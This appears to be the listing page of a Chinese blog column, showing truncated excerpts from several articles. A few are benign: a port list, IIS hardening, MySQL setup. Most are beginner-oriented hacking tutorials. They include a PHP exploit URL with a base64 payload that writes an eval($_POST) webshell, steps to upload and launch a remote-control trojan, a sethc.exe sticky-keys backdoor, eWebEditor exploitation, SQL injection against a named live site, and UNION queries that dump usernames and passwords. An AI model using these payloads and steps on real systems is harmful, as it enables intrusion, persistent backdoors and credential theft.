lbuskeep的专栏

删除函数：Public Sub RemoveDatabase_Password(ByVal strDBWithPassword As String, ByVal strPassword As String)                        On Error GoTo ErrorHandlerDim objEngine As New JRO.JetEngineDim

运行中执行 regedit在注册表里面的路径如下：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcpHKEY_LOCAL_MACHINE\SYSTE

一 、端口大全 端口：0 服务：Reserved 说明：通常用于分析操作系统.这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果.一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播.端

因为IIS(即Internet Information Server)的方便性和易用性，使它成为最受欢迎的Web服务器软件之一。但是，IIS的安全性却一直令人担忧。如何利用IIS建立一个安全的Web服务器，是很多人关心的话题。要创建一个安全可靠的Web服务器，必须要实现Windo

<br />我主要对外挂的技术进行分析,至于游戏里面的内部结构每个都不一样,这里就不做讲解了,我也没有那么厉害,所有的都知道,呵呵!<br />1 首先游戏外挂的原理<br />外挂现在分为好多种,比如模拟键盘的,鼠标的,修改数据包的,还有修改本地内存的,但好像没有修改服务器内存的哦,呵呵!其实修改服务器也是有办法的,只是技术太高一般人没有办法入手而已!(比如请GM去夜总会,送礼,收黑钱等等办法都可以修改服务器数据,哈哈)<br />   修改游戏无非是修改一下本地内存的数据,或者截获api函数等等,这里我

在数据库没被删掉的情况下。（默认：/db/ewebeditor.mdb）如果没删掉的话，把数据库给Down下来。然后打开，查看Style这里，看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件，如果有往下看。查找到这段：把那个s_light换成你刚才看到的样式名字，然后把链接补全。

<br />2.0<br />+poc:<br />include/common.inc.php?$class2_all_1[0]=[base64_encode(eval php code)]<br /><br />+Exploit:<br />/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/Picp

<br />可以执行CMD时候 <br />1.A:将远控的后缀改为.tmp，然后上传上去~！ <br />B:将该远控传上去。<br />C：用命令start e:/admin/admin.tmp，然后等着木马上线~！ <br />2.替换服务 提权shift键 <br />A:在CMD下执行一下命令： copy c:/windows/explorer.exe c:/windows/system32/sethc.exe copy c:/windows/system32/sethc.exe c:/windo

<br />  一、怎么样取得最新版本的MySQL？ <br />   <br />  　　要安装MySQL,首先要当然要取得它的最新版本，虽然大家都知道在FreeBSD的Packages中可以找到MySQL，但是我还是建议大家到网络上去找最新版本的MySQL。我介绍大家到http://www.mysql.org去下载，这里 <br />  的最新版本是MySQL 3.23 versions 。 <br />   <br />  二、安装MySQL时候的注意事项？ <br />   <br />  1、如果

PHP注入实例 听承诺说ＣＡＳＩ出２.0了，而且承诺也给了一个有漏洞的地址，正好没事就测试了一下，最近非常郁闷，学不下去，正好今天承诺勾起了我学习php的美好时光，看看自己还能不能搞这样的站吧.过程：承诺给的地址是http://www.gametea.com//showboard.php?id=282很标准的php注入形式，我们也按照标准的php注入方法来进行注入，首先再后面加一个',http://www.gametea.com/showboard.php?id=282' 如图１

<br />135端口说明：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；使用DCOM可以通过网络直接进行通信，能够跨包括HTTP协议在内的多种网络传输。 <br />端口漏洞：相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒，该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分

<br />4.    md5的恶梦 <br />山东大学的王博士最近可是搞md5搞的红透了，我们也来搞一搞吧，我们比他更爽，不用计算，哈哈。 <br />md5我们是有办法绕过的，但是并不是哪里都可以，php中的md5函数就不能绕过，因为你输入的所有东西都在里面，根本跑不出。可以绕过的是sql语句中的md5。当然别的sql中的函数也是可以绕过的，道理相同哦。 <br />看例子先： <br />//login.php <br />...... <br />$query="select * from alp

<br />三：一些注入技巧，很多都是个人发现哦 <br />1.union select的技巧 <br />UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。在 SELECT 中的 select_expression 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。 <br />然而有我们可以用下面的方法来猜测列的类型，可是省去很多时间 <br />我们先 <br />http://localhost/down/index.php?url=&

我们构建注入语句吧 在输入框输入 a% and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor#放到sql语句中成了 select * from alphadb where title like %a% and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# % 结果如图17哦 怎么样，出来了吧，哈哈，一切尽在掌

本文主要是为小菜们服务的，如果你已经是一只老鸟呢，可能某些东西会感觉比较乏味，但只要你仔细的看，你会发现很多有趣的东西哦。 阅读此文你只要明白下面的这点东西就够了。 1.明白php+mysql环境是如何搭建的，在光盘中我们收录搭建的相关文章，如果您对搭建php+mysql环境不是很清楚，请先查阅此文，在上一期的专题中也有所介绍。 2.大概了解php和apache的配置，主要用到php.ini和httpd.conf 而此文我们主要用到的是php.ini的配置。为了安全起见我们一般都打开php.ini里的安全模